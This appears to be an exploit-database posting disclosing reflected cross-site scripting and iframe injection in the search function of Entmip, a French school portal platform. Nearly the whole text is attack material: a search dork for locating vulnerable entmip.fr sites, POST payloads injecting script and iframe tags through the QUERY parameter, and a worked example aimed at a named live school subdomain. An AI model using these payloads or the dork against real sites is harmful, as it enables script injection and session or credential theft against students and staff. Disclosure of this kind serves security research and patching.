Home / exploits Entmip Reflected XSS & Iframe injection
Posted on 30 November -0001
<HTML><HEAD><TITLE>Entmip Reflected XSS & Iframe injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>---------------------------------------------------------------------- [Description] #Exploit title: Entmip Reflected XSS & Iframe injection #Exploit author: Implosion #Date: 18/12/2016 #Dorks: site:.entmip.fr -site:www.xxx.com #Website: entmip.fr #Tested on: Firefox ---------------------------------------------------------------------- [Vulnerability][Reflected XSS] #URL: http://XXXXXX.entmip.fr/sg.do #POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=XXXX&QUERY="><script>alert('1')</script>+&x=0&y=0 ---------------------------------------------------------------------- [Vulnerability][Iframe Injection] #URL: http://XXXXXX.entmip.fr/sg.do #POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=XXXX&QUERY="><iframe src=https://cxsecurity.com>+&x=0&y=0 ---------------------------------------------------------------------- [Example] #URL: http://labarousse.entmip.fr/sg.do #POST DATA: %23ECRAN_LOGIQUE%23=RECHERCHE&PROC=RECHERCHE&ACTION=VALIDER&CODE_ETABLISSEMENT=6469&QUERY="><script>alert('1')</script>%2B&x=0&y=0 ---------------------------------------------------------------------- #Discovered By Implosion ----------------------------------------------------------------------</BODY></HTML>